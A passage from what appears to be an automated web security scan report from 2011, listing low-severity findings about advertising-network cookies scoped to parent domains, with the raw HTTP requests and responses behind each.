rsi_us_1000000="pUMlIy9H8BcU1P0/aqfkn2N1Aq78OHBl6ClrIVZfGzy1dmru/yhlpNRC/j+GgwUFYepOSFGHO/u1DXARCouzHHG+Ls8oVOk785qoU49AFwdml7FIDyQFDkTfPuH49HV1gXUZzy1SDhGCyhiPghO6BHg2KLacLC+JEomvevEz6AY4oFrYW/OTa8RlNPT19z7QLUXQbB6WQO7hrNSFTifVi+754gCvaBXBI5blvrX3W24Lr/6MwZDupYRWDMgGlTbvqpXv5leOYJIzI7SKLGy+IkwLaQ5E8hFwcUR/PCuBff/io/cjLbekqoieI1ELq8FXyhCdQ1ACHYn7+ZvsES11hQIq4yoVbtXQxVV9t5NEBwSv52icvj+fazqjuBUDZqw6BMDFY1K0sGNP9AOV4dT0ZhkTUQKsNT5/saAfR02CuGJK2rvaOKD9gTJUC/OOzDipobfdkJXYpsIXw2UiHUAeG38+6iUD9f24sH99k1q4QnShLTk2pbo+o6hEnr1SuDiz2Zc05B3RFfjTL2XZKuY/6eJCvw5B+ATymkNPiduuVgdeMHgMbwBTLFrOyP9TNSBZj4Z20Thdkoq/JyC8TH2eGO67FpwbVwGRx0b58He54D+AuAs5NNJVJeYha8gH8z+xOmSASpGJiBYY0UJW4Viy6eGQW2yNBastWhlxKoAnEpxuUsX33D3Jg7g3SMuEafTE3fFuGDlYUqrqWKEmBPF80lk+ykIO7FV6aF+4HF4UfYb7pA2L1g4oJE7gC+gEoCa+8CO4CAwoq8u4uvhwP56Pqv67srZgc4KfctHd5PY7lw+a1Doo4feQnlTa004zqSpWZ0cCh+x3qe+YJX8VGrKFBMGhQYyRtCtk2knN3OYQA7msg92HTm59G/lRvCd6IG1whn56kAc5eab/XpjluPIhh5r42fW1PPhevizTX5xNfLGPKg9+DOkAAVviDd8QpB+l9AWhhLpvS/KxYUAD1ZsedzdxsvRtr47/NbY7zlokTT639ngCJdSYkoq/N2d0hVMLGJ48b+XHrlzxh2zDkqYdpxZUA3IM6P1xQc0svwKk1XNb/h98JSrluzt7ewlP086tEzGourMC/RiWI4qdzHtVA4mNj5N+bCVGnyTuAoASB3OcSfq+kRPtoaUYJqkSueYSUrY03w/uoIAx8JaQc+YY1IB2EYem+UC3xKUas15kfbkv5mj29FtMloeU2fEWNjjE89J3i6pqtMssOIDJfHMCCezbfKMmTcGsiyFy/h183mZz9Bxo25q82nH5wHCOV963RzbZ+wLit78ETIizggf6HdYsEgHUsN9DZYcwpm97D7vYIWkEvVkhQ577tdx77XTsyM1waDuwz0mriwb0RVNxpuVjh74wJGO3Khd1Ej2G4l0wXXVeRXLaJpg3SjIhrAnkkm8lNJISMd64qsZX1BCKB4ogn8R57pQ/70kokmUAJkxtweHE7PHnhKC5eqqvGuB4qH4bp1S1f58dV8/Pkw2Ck8V/XMs4t4Khrz8TctV2753gQOb+Wrey1F5MQDCma4c0vVj0hY1BL3laNqQqgyHbRtQRsEgKiD1tulYdIPVXYixeTks0537ikMNaohAvHzDgnzmpsz5etYpkfcGkMw=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS8NW9oZDZFaEP3/Yfrnhu4IU3vheM/Ns0vAjloMpK625XiMz/7xhK4LyZJaQSIcY62RPvVLOf3Rqv8g6s+S0M37pSe4EUYkkllytqzoreA1HphdoGataiGY4MsnrRzbfN6fbGCdJ172IioJGG1zG79GGw30oDC4C7VmxYrej3tFQObZgU/tZkjzZn3Hdaqh0eSrDXnAp9zEz+/boOL3WcogTsj3/5fveweY9zxSv/NNwjuCrs5KZBGPT52bhf9l1YcBc1sBVfIM0OwL3Q45hRQoNrZ+sSycfMhs3uZuHsbYIbscOzTaWr8wcP588YnH8VwzJkxibne7pWZ+tDF3WLkweCsOEB2wduQ/Nt+cxKZtZnWKHe6ubb1RHQU/4XJhond4VmDT+2+NQRAcIqO6b7DwRmCs6bBKfFEsME2KDEO7yQvuJyHviRatdQMpprGvH8Wo5s4ekgfmi9/UxSZ3IIYryMySkUDTqkcuv2l2EsbCBlgSv+kEo3KEj2gb4P8DVwOHPUvbXXxaY2U9CXG8qiIj8oYq2earIwKHoufO8sYTyJ9sisD/FTESrdnc4kYVPvw/iARgA4NrcDBkZaQk=; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; rtc_eC0O=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3tvXN5oCW6CTkwctQrAqXr4DyB/E++0lrZBz0XEqsdq/oLkcyD1HB535ecH2yQk8aXHAMOJs+2n+rxyycgR1MKWlhAgxfS3iSrgAs2jpe+yvn8K2rxozalguXRbMHL1Xj0tc//rI4kc7qGS/eDlhXRyox/8cF3uA+CrH0aRzrpciC6E5la1vQpLqPPunsYUn/u3AT+p36gLGc+SA5z/ryJK9/Lfn0bClh2vlrtBAzuZujVJMiKWDlaqxnMt+wg0Jw3lGCxNfWFbPJFZL1lKYNzXADwpgINcAOlL0r2FeKDYHge/rbscRTiZElGwFimOI11JRk0KklHrGCNiy26N8IhhTg2d/1v4vKGw9kYA9cE9B7rEq5akAFx+4/I5CjjIdhSJqqNA+OleQZ7fR/OWLFZ4AAD7HeRUnfiE8B1nXx1a5s7ylk4i1PgGL2Zab/y6UPgdZhTF/KD1yRVSz5gNQ+z7aZEKA8CKuYPMoT+Tkf1lWpBY+MKtaGNSFt76vzw7dxpBqf9fV4a1O/mlnH34bm15MqeWDpsKusAedE02istIFaC5/UxHUbLUSdP8x9dEUpVLKXrP8SZWv2zoryuV+qPQyII355Ntg+tfY/KzBWMuBUdc4ibR3EofEeFdvCEB012oNMa/Hnhjxvn+wWGlPXXy/9sgUt5O8/ytF7yiVr3R9PUTG49A+48Cx+SJbt/zwaM/ej9Lgel9YlJ5ko/7YzqPpG9+wRugmdqyGiKiRwCQqX7wNDyk7qKQs/kfG24bBIDhcB4aHnoin/3aoPW1zJJGJ/ibTimX8T/1YGkKApW2CWoG3arEGma7zn0LNQgmKLfCkiypAQnXIgQ7T8F2cCEfDA22ug/LibefoTAuMLTQgGjesCPdbNrwfnxuoaGP9GNAYzLF0//YJigvUNpcPG27VYw1qyWwoxnJ9q5OTOoRCa3MezIUW6npAkKMdyaL5jK8GDnT/fBycyjRwWINB3wcR4MiH14bRLdeTdXZUICfcViDmdmEqrHNdbCGDzq84XAH9e0pTSUCU+aOcvgZA9rEbArxlNNffMDswsC2g/Uhusot+1v7+gDJjTa/Ztj+4Zq6KW9y9XPeGG+9QUI/aZaqMFx7PMX6UPD1534KvbEeYfe2CojNDeFG6iVcUKjF5PeGLrloX2YixITiGVvkKWSx13RxyF/0Cnlnkewfn18srhgSd/xEN9UNu8F6IEABtK2r0Vu4ryeFrfjFVdC1ZGR9BC4a/lX1cgQnaiLo0Zkyx1pATonDkg3Jx4sUThFEX0LhkAN+C/v+2BtkiEUf7wiGqAGE7Lfb8scj6F1f2OQ1yNJsp86R0g/mnstNh8Zn72QsN0xHDyr5BP27t+1q1QV3n/lXD8jsppi2TEBvRWtVgKgJJF1OxRv3P+0/t1Jc1A7fNTtde5mnZkj/GfpB6KkYhBTIxOySOOwmnTFvbQPO6O0jIgSA419dsfLPK0nVH2RJ3KC/IPOdPz7QSH4IAbhJ5NEoQf28ctm+FdwTR7L53m49f54hp9uWL0PfS/V/YCt4Qj5kQrR/9/8QBUF+WRCDYYbIhJrHdLroy/d5ne0X3zGbhGKAzI8w7voTqtTGzBGLgJmtFoQdjOiGG9Tj6N4gj/Oxabtr0rWazwXS5TzjG/UYbfMobryzEnZVdDVbrmwZAJh/h8HMvesrk5jWgk8xvy60mxPuVSK5VLx5Yhz5C0riAFQ4usH3bjTnUF8ipaBWYatjwQl9p4xFkzA7gqA==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:22:34 GMT; Path=/
Last-Modified: Mon, 13 Jun 2011 11:22:34 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 13 Jun 2011 12:22:34 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:22:34 GMT
Content-Length: 6437

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'H07710';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

12.93. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

xltl=eJxdjTsLwkAQhP%252FL9oG73b3XWgUVUTSKL8RGLnc5FMtgJf53Y0q7mWHmmyhG3r2QwGk5g8mgUIBjKay0aYMnbAMVduxyijo75Bzir6e1wOuRbwdUvGym49QK%252BNKajmKqPEWqOKVY%252BRxd5Qp23AVr2af%252FeT27%252FCJ0AtN6fpjvat9cFqvzpr%252BX1xO3%252Fenorv34ILDeD18P0RZZMfp%252F1K4Z6UGAePDaIBtUyhIpb2Dy%252BQKAGD%252Be; expires=Tue, 11-Oct-2011 11:08:21 GMT; path=/; domain=.exelator.com
TFF=eJydlb1uxSAMhd8lT4AdwJgseYyuGTJU6tZuV%252FfdC1FCEn5akwGB0PnAxzZi8SP717cH9AMoPSOomZlxmBaP%252FvXpYQrDKgqTikvDbnoXeoj6MdPjPq4cJUxGhFnpuxL1ruLy7PVj%252FVp%252B1qFBgK7YwBCPMlC1nYKJy1JvchOHAcg4SpiMCHu5bThMjJWYYDu8WjrUp54q%252BjyilCzKOEqYlNhuIpqVqme30OuLHgmx2STwH9lsyL9IYB4Jn5A6kEp%252B5z0vRRcJOSvlKGEyIsxEHTFtrS2t8V3f5f3C9Xjfsa4sGxsQjDe5ofEOTy5sHf2wcwCOND8iaz0oIi0rg1pM3l0%252B5fL6Sbm8fm3OXHKDjq2TFyRH5S4pkTIi%252Fii2IxNbS0L1xZx%252FVF0vzjglTEa8fwGkIANj; expires=Tue, 11-Oct-2011 11:08:21 GMT; path=/; domain=.exelator.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=104&g=050&ssv_duid=910903057632460979 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxdjTsLwkAQhP%252FL9oG73b3XWgUVUTSKL8RGLnc5FMtgJf53Y0q7mWHmmyhG3r2QwGk5g8mgUIBjKay0aYMnbAMVduxyijo75Bzir6e1wOuRbwdUvGym49QK%252BNKajmKqPEWqOKVY%252BRxd5Qp23AVr2af%252FeT27%252FCJ0AtN6fpjvat9cFqvzpr%252BX1xO3%252Fenorv34ILDeD18P0VazYuZ%252F1K4Z6UGAePDaIBtUyhIpb2Dy%252BQJ%252Fgj%252Bb; BFF=eJzNlb9SwzAMxt8lT2DLThy7S0Mz0DsSeiRwYeI6MjMC746TGFf%252Bo%252FboAKz66ZMUy%252F5yNBLM%252B5vhzBQjZ7Lfaq2h2LwaXjG1sUCYorvvx9u755en%252FbAfi83RVJSm1LXVlC6OQkGuwMAmD8Dkvt99MD7T0nUHJztRDMCDWKM8iQrN%252Faf4%252B9ysE%252F5knCswcLM27eRmrSLZiWIAHsQa5UlUqLkZtxoUAENALHEqk0fgoZuyJWycysyV4PYMFGSAtIDFiubQ5%252Bc%252B9FQmp04Y8GaTEwb6hAONQhqRzhbUDJYtUc1ElanKz4kx1KZox107TyrXMJc2LNcwisyJzeOQS7RhFPk%252Btq4dwke0UoYpBuBBrFGeZNrY1YX3P2iz0kybZeOhRnkSFeq6dltpVgL%252BcLHEcWa4Bs5rJTXmaA0pDMVJNyxOoULGBJni2LggU3U2LnIkV5UcaRanEF%252BC5e3U1CUA%252BhLU1L6BulYrpfd90nxm%252FwPhyyf%252BA7TdZ529joHA4LyN025NGvPPffg3bPdal73KTJMnk0LaM%252FNiDAnPJBzygh%252FStnfB4WgjIz3rH1vUXznR1YZD%252BsoXd2iPRA%253D%253D; TFF=eJydlTFyxCAMRe%252ByJ0AyIMCNj5HWhYvMpEu6nb17BGMTW8Yb4YKBYf4DfUk2cxpien4nwPQAYycEM8UY8THOCdPzM8HIwxviyeSli2F8nfSQ9YPQ4zr2HFVMR%252FBsrFCGVSVj4rOXj%252BVr%252FlnE2WBXAmQ42QZyPMZB03bV5%252BVZ76SJzQAIjiqmI3hP2q4mhkZMUA5vly786amhP0W0pdcJjiqmJcpNRJMx7eyS1NudHgnxskngP%252FKyId%252BREONAeIe0TBr9nce8nLpIyXktRxXTETwTdcRUWltb46O%252By%252FuO6%252FG%252BYl1Zdp4RzDeFy59J5Xhr64eVAwhk4y2y1YMq0kfj0KrJo8u7nKyflpP1u%252BbcLjcYog%252F6gkhU75IqqSPyi%252BI7MlFaEppfTOHe6NUZp4rpiNcvmzkDYg%253D%253D; EVX=eJyNkEsOgzAMRO%252FCCTzOx7FzGIsl6y4r7t4ApQio2uwsvTfyaEYr9pxMVVMdLS031Yeh2IBM7OJM0SnBs2Ook%252BGg0ihEnAieNspnumYPGj4Uccmm3CjvNJ7pmsU7O7eKLMzUSuJS8lZjl9EpR9VAvXJbKjc1%252FFNvS1224B9bbG%252FKvdFXFSgStVPOSoljlzy%252FADmAiA4%253D

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxdjTsLwkAQhP%252FL9oG73b3XWgUVUTSKL8RGLnc5FMtgJf53Y0q7mWHmmyhG3r2QwGk5g8mgUIBjKay0aYMnbAMVduxyijo75Bzir6e1wOuRbwdUvGym49QK%252BNKajmKqPEWqOKVY%252BRxd5Qp23AVr2af%252FeT27%252FCJ0AtN6fpjvat9cFqvzpr%252BX1xO3%252Fenorv34ILDeD18P0RZZMfp%252F1K4Z6UGAePDaIBtUyhIpb2Dy%252BQKAGD%252Be; expires=Tue, 11-Oct-2011 11:08:21 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlb1uxSAMhd8lT4AdwJgseYyuGTJU6tZuV%252FfdC1FCEn5akwGB0PnAxzZi8SP717cH9AMoPSOomZlxmBaP%252FvXpYQrDKgqTikvDbnoXeoj6MdPjPq4cJUxGhFnpuxL1ruLy7PVj%252FVp%252B1qFBgK7YwBCPMlC1nYKJy1JvchOHAcg4SpiMCHu5bThMjJWYYDu8WjrUp54q%252BjyilCzKOEqYlNhuIpqVqme30OuLHgmx2STwH9lsyL9IYB4Jn5A6kEp%252B5z0vRRcJOSvlKGEyIsxEHTFtrS2t8V3f5f3C9Xjfsa4sGxsQjDe5ofEOTy5sHf2wcwCOND8iaz0oIi0rg1pM3l0%252B5fL6Sbm8fm3OXHKDjq2TFyRH5S4pkTIi%252Fii2IxNbS0L1xZx%252FVF0vzjglTEa8fwGkIANj; expires=Tue, 11-Oct-2011 11:08:21 GMT; path=/; domain=.exelator.com
Date: Mon, 13 Jun 2011 11:08:21 GMT
Server: HTTP server
Content-Length: 127

document.write('<img src="http://d.xp1.ru4.com/meta?_o=65121&_t=xl&&ssv_duid=910903057632460979" width="1" height="1"></img>');

12.94. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:21:11 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dE361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIyaEDEAoYAiACKAIwveHX7wQQveHX7wQYAQ..; acb645526=![nC'kI/7Z208jSlb1@WvA.(S?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQOtdn4PwOjpp_ayDGovBdy-98PVNAAAAAMf7BwACAgAANQEAAAIAAABpowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAA3w4BAgUCAQUAAAAAkiK-AQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963581%29%3Buf%28%27r%27%2C+369513%2C+1307963581%29%3Bppv%2811776%2C+%277582437727306472939%27%2C+1307963581%2C+1310555581%2C+62058%2C+73484%29%3B&cnd=!nSAXCQjq5AMQ6cYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGaAYgBFpABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NQVcLQjq5AMQ6cYWGIy-BCAA; sess=1; uuid2=3420415245200633085; anj=Kfu=8fG5`$gj[2<?0P(*AuB-u**g1:XIExTEhzVq!C]izV)`B-dm6^/R#16^D_yYJ*rQ@@siImB776n(i4L:4MOprT?Prayh5d@g.6-d+(D)W'@19bi.9HW%11sPv^@m7$Y'1Lwurq-wfd>XiFe(ebw70Olkr]0`9yQ(Ob=^3-B_cI)W18zQQyMNjrq?!RadDw@R[W@LY'3X-4KL%T/RS:d3jhcQ.t$=(XsdKm4p.S7Po>a)5(f7JRRe(6NalOe5p6.x#XxGG4MCRzSHkii.)v)l%veZkwaqz3$(DtYXCI'U8r%=P+*nV4^wn`mP6sZ@R/fYwLsH$B@.)w(`MMgRlx!c3RU/Ak$$usG3X[(e(PHmONh(QN$cQ5S:Oy@:M<VW+Cst(+:`6Gjlx6z`%cj_1U>(XB2sNUM:1S1D43!q5NKc9j.'H_1(>[5-@?HN=R'!_-KcyuQv)VFfU8ya$_Z!YC_U.yB%F<HF-sG3IRz>lG=H-CvPD+jK4Tcbq7hp1<fL+/M5m/7K3SiE^PP8zL-1MtiM5^H!!1zk-!!!!!

Response

12.95. http://m.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

66281-B66290=3|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=tg&ssv_tg_1=&ssv_tg_2=&ssv_tg_3=000&ssv_tg_4=&ssv_duid=910903057632460979&ssv_tg_5=0&ssv_tg_6=0&ssv_tg_7=0&ssv_tg_8=k1-0,k2-0,k4-0,k5-0,k6-0,k7-0,k8-0,k9-0,k10-0,k11-0,k12-0,k13-0,k20-0,k21-0,k22-0 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; C1780853=0@4; M62795-747980=1; M62795-52787=1; M62795-97956=1; P37257=c3N2X2J8YzF8MTMwNjUyNDkyNHxzc3ZfYzF8WXwxMzA2NTI0OTI0fA==; M62795-747979=1; O1807966=4112; P1807966=c3N2X2MyfFl8MTMwNzA2MDc5N3xzc3ZfMXwyODU0NDU1MDF8MTMwNzA2MDc5N3xzc3ZfYzR8WXwxMzA2NTM0NDg0fA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:11:08 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 66281-B66290=3|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
Connection: close

12.96. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lyc=BAAAAAQKuvBNACAAAVBbIASgAAalTAAA7+znYBcBaFagFCAABqFFAAD58fVgFwG0RyAQoAAASqAHQADgBRcBAAA=; domain=.fastclick.net; path=/; expires=Wed, 12-Jun-2013 11:18:20 GMT
pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Wed, 12-Jun-2013 11:18:20 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=18356&evt=69&cat1=56&cat2=74 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1498390;type=mtvre912;cat=remot936;ord=4072029369417.578?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=5649:246446:521256:52744:0:1305746989:1|8624:279632:521653:48171:0:1305981615:0|; adv_ic=BwYAAAC3stdNIAYGAAFJAADrXCAHIAtAAAGiseABFwGMTuABFwCR4AIXAeNf4AEXAGzgAhcEzU8AAApARCAAAF/gAhcBtFbgAS8AKeACFwF4XcAXAQAA; lyc=AwAAAATv7OdNACAAAWhWIASgAAahRQAAoGjhYBcBUFugFCAAAaVMIASgAOAFFwEAAA==; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:18:20 GMT
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=BAAAAAQKuvBNACAAAVBbIASgAAalTAAA7+znYBcBaFagFCAABqFFAAD58fVgFwG0RyAQoAAASqAHQADgBRcBAAA=; domain=.fastclick.net; path=/; expires=Wed, 12-Jun-2013 11:18:20 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Wed, 12-Jun-2013 11:18:20 GMT

GIF89a.............!.......,...........D..;

12.97. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.photobucket.com
Path:	/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

flash=deleted; expires=Sun, 13-Jun-2010 11:02:11 GMT; path=/; domain=.photobucket.com
daily=referer%3Dwww.mavsmoneyball.com; expires=Tue, 14-Jun-2011 11:02:14 GMT; path=/; domain=.photobucket.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image/recent/Smirk_Dog/GIFS/MacSigDance.gif HTTP/1.1
Host: media.photobucket.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

12.98. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QW4uQO1018RL|O1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/fanposts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
